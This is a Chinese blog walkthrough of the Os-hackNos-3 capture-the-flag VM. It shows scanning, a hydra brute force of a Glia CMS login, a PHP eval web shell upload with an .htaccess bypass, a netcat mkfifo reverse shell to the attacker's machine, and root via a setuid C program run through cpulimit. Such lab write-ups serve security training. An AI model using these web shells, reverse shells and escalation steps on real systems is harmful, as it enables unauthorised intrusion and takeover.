Os-hackNos-3

Os-hackNos-3

一、主机发现和端口扫描

  • 主机发现,靶机地址192.168.80.145

     arp-scan -l
    

    在这里插入图片描述

  • 端口扫描,开放了22和80端口

    nmap -P -sV 192.168.80.145
    

    在这里插入图片描述

二、信息收集

  • 访问80端口

    find the Bug
    You need extra WebSec
    
    翻译
    找到Bug
    你需要额外的网络安全
    

    在这里插入图片描述

  • 路径扫描

    dirsearch -u "http://192.168.80.145/" -e *
    

    在这里插入图片描述

  • 访问/scripts

    在这里插入图片描述

  • 查看automail.pl文件

    #!/usr/bin/perl
    #######################################################################
    #    automail.pl
    #
    #    Perl script used for remote email piping...same as as the PHP version.
    #
    #    Peter Rotich <peter@osticket.com>
    #    Copyright (c) 2006-2013 osTicket
    #    http://www.osticket.com
    #
    #    Released under the GNU General Public License WITHOUT ANY WARRANTY.
    #    See LICENSE.TXT for details.
    #
    #    vim: expandtab sw=4 ts=4 sts=4:
    #######################################################################
    
    #Configuration: Enter the url and key. That is it.
    #  url=> URL to pipe.php e.g http://yourdomain.com/support/api/tickets.email
    #  key=> API Key (see admin panel on how to generate a key)
    
    %config = (url => 'http://yourdomain.com/support/api/tickets.email',
               key => 'API KEY HERE');
    
    #Get piped message from stdin
    while (<STDIN>) {
        $rawemail .= $_;
    }
    
    use LWP::UserAgent;
    $ua = LWP::UserAgent->new;
    
    $ua->agent('osTicket API Client v1.7');
    $ua->default_header('X-API-Key' => $config{'key'});
    $ua->timeout(10);
    
    use HTTP::Request::Common qw(POST);
    
    my $enc ='text/plain';
    my $req = (POST $config{'url'}, Content_Type => $enc, Content => $rawemail);
    $response = $ua->request($req);
    
    #
    # Process response
    # Add exit codes - depending on what your  MTA expects.
    # By default postfix exit codes are used - which are standard for MTAs.
    #
        
    use Switch;
    
    $code = 75;    
    switch($response->code) {
        case 201 { $code = 0; }
        case 400 { $code = 66; }
        case [401,403] { $code = 77; }
        case [415,416,417,501] { $code = 65; }
        case 503 { $code = 69 }
        case 500 { $code = 75 }
    }
    #print "RESPONSE: ". $response->code. ">>>".$code;
    exit $code;
    
    这段Perl脚本的功能是通过osTicket API将电子邮件消息发送到指定的URL,并根据响应的状态码确定退出码。
    
    1. `%config = (url => 'http://yourdomain.com/support/api/tickets.email', key => 'API KEY HERE');` - 定义了存储URL和API密钥的哈希表。
    2. `while (<STDIN>) { $rawemail .= $_; }` - 从标准输入读取管道传输的电子邮件消息并存储在变量 `$rawemail` 中。
    3. `use LWP::UserAgent; $ua = LWP::UserAgent->new; $ua->agent('osTicket API Client v1.7'); $ua->default_header('X-API-Key' => $config{'key'}); $ua->timeout(10);` - 导入LWP::UserAgent模块,创建UserAgent对象,并设置默认的用户代理和超时。
    4. `use HTTP::Request::Common qw(POST);` - 导入HTTP::Request::Common模块,并引入POST请求类型。
    5. `my $req = (POST $config{'url'}, Content_Type => $enc, Content => $rawemail); $response = $ua->request($req);` - 创建一个POST请求,将原始电子邮件消息作为内容发送到指定的URL,并获取响应。
    6. `use Switch;` - 导入Switch模块,用于实现switch语句。
    7. `switch($response->code) { case 201 {...} case 400 {...} ... }` - 用switch语句根据响应状态码选择不同的退出码(根据邮件传输代理的标准)。
    8. `exit $code;` - 根据计算得到的退出码退出脚本
    
  • 没啥价值,根据上面的提示访问/websec路径,发现一个博客和一个邮箱

    contact@hacknos.com
    

    在这里插入图片描述

  • 博客使用Glia CMS搭建的

    在这里插入图片描述

    在这里插入图片描述

三、密码爆破

  • 猜测刚才发现的邮箱就是用户名,再爬取网站信息生成密码本

    cewl http://192.168.80.145/websec/ >/tmp/passwd
    

    在这里插入图片描述

  • 密码爆破

    hydra -l contact@hacknos.com -P /tmp/passwd 192.168.80.145 http-post-form "/websec/login:username=^USER^&password=^PASS^:Wrong email or password" -V
    

    在这里插入图片描述

  • 登录系统,发现是管理员权限,版本是1.10.9

    用户名:contact@hacknos.com
    密码:Securityx
    

    在这里插入图片描述

四、漏洞利用

  • 在后台发现文件上传功能(content->file managee),上传一句话mua

    <?php @eval($_POST['glc']);?>
    

    在这里插入图片描述

  • 发现文件被上传到了assets目录,在该目录中发现了.htaccess文件禁止访问php文件,那么将deny from all删除后保存

    在这里插入图片描述

  • 使用蚁剑连接,拿到shell

    在这里插入图片描述

五、权限提升

  • nc建立连接

    kali:nc -lvnp 8848
    靶机:rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/bash 2>&1|nc 192.168.80.139 8848 >/tmp/f
    
    
    然后执行python -c 'import pty; pty.spawn("/bin/bash")'
    

    在这里插入图片描述

  • 查看是否存在可以提权的命令

    find /usr/bin -type f -perm -u=s 2>/dev/null
    

    在这里插入图片描述

1.第一种方法
  • 发现cpulimit 命令,尝试用cpulimit提权

    一个用户调整CPU使用的命令,cpulimit`命令主要对长期运行的和 CPU 密集型的进程有用
    
    #include<stdio.h>
    #include<unistd.h>
    #include<stdlib.h>
    
    int main()
    {
      setuid(0);
      setgid(0);
      system("/bin/bash");
      return 0;
    }
    
  • 将上面的代码编译为exp,上传之后使用添加运行权限

    gcc cpu.c -o exp
    chmod 777 exp
    

    在这里插入图片描述

  • 使用cpulimit -l 100 -f ./exp进行提权

2.第二种方法
  • /var/local/database中发现了经过加密的内容

    Expenses
    Software Licenses,$2.78
    Maintenance,$68.87
    Mortgage Interest,$70.35
    Advertising,$9.78
    Phone,$406.80
    Insurance,$9.04
    Opss;fackespreadsheet
    

    在这里插入图片描述

  • 对密文进行解密,得到密码明文Security@x@

    https://link.csdn.net/?target=https%3A%2F%2Fwww.spammimic.com%2Fspreadsheet.php
    
  • 登录用户blackdevil,该用户是在/home目录下发现的,然后用sudo提权

    在这里插入图片描述

  • 3
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 打赏
    打赏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

果粒程1122

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值